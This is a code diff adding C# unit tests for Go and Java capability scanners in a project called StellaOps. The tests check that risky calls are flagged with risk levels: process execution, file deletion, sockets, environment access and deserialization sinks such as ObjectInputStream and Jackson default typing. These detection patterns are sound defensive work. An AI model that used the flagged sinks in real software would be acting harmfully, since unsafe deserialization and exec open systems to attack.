+ Assert.Equal("os.Chmod/Chown", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsOsChown()
+ {
+ const string code = @"os.Chown(""file.txt"", 1000, 1000)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("os.Chmod/Chown", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsOsSymlink()
+ {
+ const string code = @"os.Symlink(""target"", ""link"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("os.Symlink/Link", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsOsMkdir()
+ {
+ const string code = @"os.Mkdir(""dir"", 0755)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("os.Mkdir", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsOsReadFile()
+ {
+ const string code = @"data, _ := os.ReadFile(""file.txt"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("os.ReadFile/WriteFile", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsIoutilReadFile()
+ {
+ const string code = @"data, _ := ioutil.ReadFile(""file.txt"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("ioutil", result[0].Pattern);
+ }
+
+ #endregion
+
+ #region ScanFile - Network Patterns
+
+ [Fact]
+ public void ScanFile_DetectsNetDial()
+ {
+ const string code = @"conn, _ := net.Dial(""tcp"", ""localhost:8080"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("net.Dial", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsNetListen()
+ {
+ const string code = @"ln, _ := net.Listen(""tcp"", "":8080"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("net.Listen", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsHttpGet()
+ {
+ const string code = @"resp, _ := http.Get(""https://example.com"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("http.Get/Post", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsHttpPost()
+ {
+ const string code = @"resp, _ := http.Post(""https://example.com"", ""application/json"", body)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("http.Get/Post", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsHttpListenAndServe()
+ {
+ const string code = @"http.ListenAndServe("":8080"", nil)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("http.ListenAndServe", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsNetLookupHost()
+ {
+ const string code = @"addrs, _ := net.LookupHost(""example.com"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("net.Lookup", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Low, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Environment Patterns
+
+ [Fact]
+ public void ScanFile_DetectsOsGetenv()
+ {
+ const string code = @"val := os.Getenv(""PATH"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Environment, result[0].Kind);
+ Assert.Equal("os.Getenv", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsOsLookupEnv()
+ {
+ const string code = @"val, ok := os.LookupEnv(""PATH"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Environment, result[0].Kind);
+ Assert.Equal("os.Getenv", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsOsSetenv()
+ {
+ const string code = @"os.Setenv(""MY_VAR"", ""value"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Environment, result[0].Kind);
+ Assert.Equal("os.Setenv", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsOsEnviron()
+ {
+ const string code = @"env := os.Environ()";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Environment, result[0].Kind);
+ Assert.Equal("os.Environ", result[0].Pattern);
+ }
+
+ #endregion
+
+ #region ScanFile - Serialization Patterns
+
+ [Fact]
+ public void ScanFile_DetectsGobDecoder()
+ {
+ const string code = @"dec := gob.NewDecoder(reader)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("gob.Decoder/Encoder", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsJsonUnmarshal()
+ {
+ const string code = @"json.Unmarshal(data, &obj)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("json", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Low, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsXmlUnmarshal()
+ {
+ const string code = @"xml.Unmarshal(data, &obj)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("xml.Unmarshal", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsYamlUnmarshal()
+ {
+ const string code = @"yaml.Unmarshal(data, &obj)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("yaml.Unmarshal", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Crypto Patterns
+
+ [Fact]
+ public void ScanFile_DetectsSha256New()
+ {
+ const string code = @"h := sha256.New()";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
+ Assert.Equal("crypto/hash", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Low, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsAesNewCipher()
+ {
+ const string code = @"block, _ := aes.NewCipher(key)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
+ Assert.Equal("crypto/cipher", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsRsaGenerateKey()
+ {
+ const string code = @"key, _ := rsa.GenerateKey(rand.Reader, 2048)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
+ Assert.Equal("crypto/rsa", result[0].Pattern);
+ }
+
+ #endregion
+
+ #region ScanFile - Database Patterns
+
+ [Fact]
+ public void ScanFile_DetectsSqlOpen()
+ {
+ const string code = @"db, _ := sql.Open(""postgres"", connStr)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Database, result[0].Kind);
+ Assert.Equal("sql.Open", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Dynamic Code Patterns
+
+ [Fact]
+ public void ScanFile_DetectsReflectValueCall()
+ {
+ const string code = @"
+import ""reflect""
+v.Call(args)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
+ Assert.Equal("reflect.Value.Call", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsMethodByName()
+ {
+ const string code = @"m := v.MethodByName(""Execute"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
+ Assert.Equal("reflect.MethodByName", result[0].Pattern);
+ }
+
+ #endregion
+
+ #region ScanFile - Reflection Patterns
+
+ [Fact]
+ public void ScanFile_DetectsReflectTypeOf()
+ {
+ const string code = @"t := reflect.TypeOf(obj)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ Assert.Equal("reflect.TypeOf/ValueOf", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Low, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsReflectNew()
+ {
+ const string code = @"v := reflect.New(t)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ Assert.Equal("reflect.New", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsRuntimeCaller()
+ {
+ const string code = @"_, file, line, _ := runtime.Caller(0)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ Assert.Equal("runtime.Caller", result[0].Pattern);
+ }
+
+ #endregion
+
+ #region ScanFile - Native Code Patterns
+
+ [Fact]
+ public void ScanFile_DetectsCgoImport()
+ {
+ const string code = @"import ""C""";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Contains("C", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsUnsafePointer()
+ {
+ const string code = @"ptr := unsafe.Pointer(&x)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("unsafe.Pointer", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsGoLinknameDirective()
+ {
+ const string code = @"//go:linkname localName runtime.someInternalFunc";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("go:linkname", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsGoNoescapeDirective()
+ {
+ const string code = @"//go:noescape
+func unsafeFunc(ptr *byte)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("go:noescape", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsSyscallSyscall()
+ {
+ const string code = @"r1, r2, err := syscall.Syscall(SYS_WRITE, fd, buf, count)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("syscall.Syscall", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Plugin Patterns
+
+ [Fact]
+ public void ScanFile_DetectsPluginOpen()
+ {
+ const string code = @"p, _ := plugin.Open(""plugin.so"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.PluginLoading, result[0].Kind);
+ Assert.Equal("plugin.Open", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ #endregion
+
+ #region GoCapabilityEvidence Tests
+
+ [Fact]
+ public void Evidence_DeduplicationKey_IsCorrect()
+ {
+ var evidence = new GoCapabilityEvidence(
+ CapabilityKind.Exec,
+ "test.go",
+ 10,
+ "exec.Command");
+
+ Assert.Equal("Exec|test.go|10|exec.Command", evidence.DeduplicationKey);
+ }
+
+ [Fact]
+ public void Evidence_ConfidenceIsClamped()
+ {
+ var evidence1 = new GoCapabilityEvidence(
+ CapabilityKind.Exec, "test.go", 1, "pattern",
+ confidence: 2.0f);
+ var evidence2 = new GoCapabilityEvidence(
+ CapabilityKind.Exec, "test.go", 1, "pattern",
+ confidence: -1.0f);
+
+ Assert.Equal(1.0f, evidence1.Confidence);
+ Assert.Equal(0.0f, evidence2.Confidence);
+ }
+
+ [Fact]
+ public void Evidence_CreateMetadata_IncludesAllFields()
+ {
+ var evidence = new GoCapabilityEvidence(
+ CapabilityKind.Exec,
+ "test.go",
+ 10,
+ "exec.Command",
+ snippet: "cmd := exec.Command(\"ls\")",
+ confidence: 0.95f,
+ risk: CapabilityRisk.Critical);
+
+ var metadata = evidence.CreateMetadata().ToDictionary(kv => kv.Key, kv => kv.Value);
+
+ Assert.Equal("exec", metadata["capability.kind"]);
+ Assert.Equal("test.go:10", metadata["capability.source"]);
+ Assert.Equal("exec.Command", metadata["capability.pattern"]);
+ Assert.Equal("critical", metadata["capability.risk"]);
+ Assert.Equal("0.95", metadata["capability.confidence"]);
+ Assert.Contains("exec.Command", metadata["capability.snippet"]);
+ }
+
+ [Fact]
+ public void Evidence_ToLanguageEvidence_ReturnsCorrectFormat()
+ {
+ var evidence = new GoCapabilityEvidence(
+ CapabilityKind.Exec,
+ "test.go",
+ 10,
+ "exec.Command");
+
+ var langEvidence = evidence.ToLanguageEvidence();
+
+ Assert.Equal(LanguageEvidenceKind.Metadata, langEvidence.Kind);
+ Assert.Equal("test.go", langEvidence.Source);
+ Assert.Equal("line:10", langEvidence.Locator);
+ Assert.Equal("Exec:exec.Command", langEvidence.Value);
+ }
+
+ #endregion
+}
diff --git a/src/Scanner/__Tests/StellaOps.Scanner.Analyzers.Lang.Java.Tests/Internal/JavaCapabilityScannerTests.cs b/src/Scanner/__Tests/StellaOps.Scanner.Analyzers.Lang.Java.Tests/Internal/JavaCapabilityScannerTests.cs
new file mode 100644
index 000000000..67de4c52b
--- /dev/null
+++ b/src/Scanner/__Tests/StellaOps.Scanner.Analyzers.Lang.Java.Tests/Internal/JavaCapabilityScannerTests.cs
@@ -0,0 +1,786 @@
+using StellaOps.Scanner.Analyzers.Lang.Java.Internal.Capabilities;
+
+namespace StellaOps.Scanner.Analyzers.Lang.Java.Tests.Internal;
+
+///
+/// Tests for .
+///
+public sealed class JavaCapabilityScannerTests
+{
+ private const string TestFile = "Test.java";
+
+ #region ScanFile - General Tests
+
+ [Fact]
+ public void ScanFile_NullContent_ReturnsEmpty()
+ {
+ var result = JavaCapabilityScanner.ScanFile(null!, TestFile).ToList();
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_EmptyContent_ReturnsEmpty()
+ {
+ var result = JavaCapabilityScanner.ScanFile("", TestFile).ToList();
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_WhitespaceContent_ReturnsEmpty()
+ {
+ var result = JavaCapabilityScanner.ScanFile(" \n\t\n ", TestFile).ToList();
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_NoPatterns_ReturnsEmpty()
+ {
+ const string code = @"
+public class Test {
+ public static void main(String[] args) {
+ System.out.println(""Hello"");
+ }
+}";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_NormalizesBackslashesInPath()
+ {
+ const string code = @"Runtime.getRuntime().exec(""cmd"");";
+ var result = JavaCapabilityScanner.ScanFile(code, @"C:\src\Test.java").ToList();
+
+ Assert.Single(result);
+ Assert.Equal("C:/src/Test.java", result[0].SourceFile);
+ }
+
+ #endregion
+
+ #region ScanFile - Comment Stripping
+
+ [Fact]
+ public void ScanFile_IgnoresSingleLineComments()
+ {
+ const string code = @"
+// Runtime.getRuntime().exec(""cmd"");
+public void method() { }";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_IgnoresMultiLineComments()
+ {
+ const string code = @"
+/*
+Runtime.getRuntime().exec(""cmd"");
+new ProcessBuilder(""ls"");
+*/
+public void method() { }";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_IgnoresJavadocComments()
+ {
+ const string code = @"
+/**
+ * Runtime.getRuntime().exec(""cmd"");
+ */
+public void method() { }";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Empty(result);
+ }
+
+ #endregion
+
+ #region ScanFile - Exec Patterns
+
+ [Fact]
+ public void ScanFile_DetectsRuntimeExec()
+ {
+ const string code = @"Runtime.getRuntime().exec(""ls -la"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("Runtime.exec", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ Assert.Equal(1.0f, result[0].Confidence);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsNewProcessBuilder()
+ {
+ const string code = @"ProcessBuilder pb = new ProcessBuilder(""ls"", ""-la"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("ProcessBuilder", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsProcessBuilderStart()
+ {
+ const string code = @"Process p = pb.start();";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("ProcessBuilder.start", result[0].Pattern);
+ }
+
+ #endregion
+
+ #region ScanFile - Filesystem Patterns
+
+ [Fact]
+ public void ScanFile_DetectsFileInputStream()
+ {
+ const string code = @"InputStream is = new FileInputStream(""file.txt"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("FileInputStream", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsFileOutputStream()
+ {
+ const string code = @"OutputStream os = new FileOutputStream(""file.txt"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("FileOutputStream", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsFilesRead()
+ {
+ const string code = @"byte[] data = Files.readAllBytes(path);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("Files.*", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsFileDelete()
+ {
+ const string code = @"file.delete();";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("File.delete", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsFileSetExecutable()
+ {
+ const string code = @"file.setExecutable(true);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("File.setExecutable", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsRandomAccessFile()
+ {
+ const string code = @"RandomAccessFile raf = new RandomAccessFile(""file.bin"", ""rw"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("RandomAccessFile", result[0].Pattern);
+ }
+
+ #endregion
+
+ #region ScanFile - Network Patterns
+
+ [Fact]
+ public void ScanFile_DetectsNewSocket()
+ {
+ const string code = @"Socket socket = new Socket(""localhost"", 8080);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("Socket", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsNewServerSocket()
+ {
+ const string code = @"ServerSocket ss = new ServerSocket(8080);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("ServerSocket", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsUrlOpenConnection()
+ {
+ const string code = @"HttpURLConnection conn = (HttpURLConnection) url.openConnection();";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.True(result.Count >= 1);
+ Assert.Contains(result, r => r.Kind == CapabilityKind.Network);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsHttpClientBuilder()
+ {
+ const string code = @"HttpClient client = HttpClient.newBuilder().build();";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("HttpClient.newBuilder", result[0].Pattern);
+ }
+
+ #endregion
+
+ #region ScanFile - Environment Patterns
+
+ [Fact]
+ public void ScanFile_DetectsSystemGetenv()
+ {
+ const string code = @"String path = System.getenv(""PATH"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Environment, result[0].Kind);
+ Assert.Equal("System.getenv", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsSystemGetProperty()
+ {
+ const string code = @"String home = System.getProperty(""user.home"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Environment, result[0].Kind);
+ Assert.Equal("System.getProperty", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsSystemSetProperty()
+ {
+ const string code = @"System.setProperty(""my.prop"", ""value"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Environment, result[0].Kind);
+ Assert.Equal("System.setProperty", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Serialization Patterns (Critical for deserialization attacks)
+
+ [Fact]
+ public void ScanFile_DetectsObjectInputStream()
+ {
+ const string code = @"ObjectInputStream ois = new ObjectInputStream(fis);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("ObjectInputStream", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsReadObject()
+ {
+ const string code = @"Object obj = ois.readObject();";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("readObject", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsXMLDecoder()
+ {
+ const string code = @"XMLDecoder decoder = new XMLDecoder(new FileInputStream(""data.xml""));";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.True(result.Count >= 1);
+ Assert.Contains(result, r => r.Pattern == "XMLDecoder" && r.Risk == CapabilityRisk.Critical);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsXStream()
+ {
+ const string code = @"XStream xstream = new XStream();";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("XStream", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsXStreamFromXML()
+ {
+ const string code = @"Object obj = xstream.fromXML(xml);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("XStream.fromXML", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsSnakeYamlLoad()
+ {
+ const string code = @"Object obj = yaml.load(input);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("Yaml.load", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsJacksonEnableDefaultTyping()
+ {
+ const string code = @"mapper.enableDefaultTyping();";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("Jackson defaultTyping", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Crypto Patterns
+
+ [Fact]
+ public void ScanFile_DetectsMessageDigest()
+ {
+ const string code = @"MessageDigest md = MessageDigest.getInstance(""SHA-256"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
+ Assert.Equal("MessageDigest", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Low, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsCipher()
+ {
+ const string code = @"Cipher cipher = Cipher.getInstance(""AES/CBC/PKCS5Padding"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
+ Assert.Equal("Cipher", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsWeakCryptoMD5()
+ {
+ const string code = @"MessageDigest md = MessageDigest.getInstance(""MD5"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.True(result.Count >= 1);
+ Assert.Contains(result, r => r.Pattern == "Weak crypto algorithm" && r.Risk == CapabilityRisk.High);
+ }
+
+ #endregion
+
+ #region ScanFile - Database Patterns
+
+ [Fact]
+ public void ScanFile_DetectsDriverManagerGetConnection()
+ {
+ const string code = @"Connection conn = DriverManager.getConnection(url);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Database, result[0].Kind);
+ Assert.Equal("DriverManager.getConnection", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
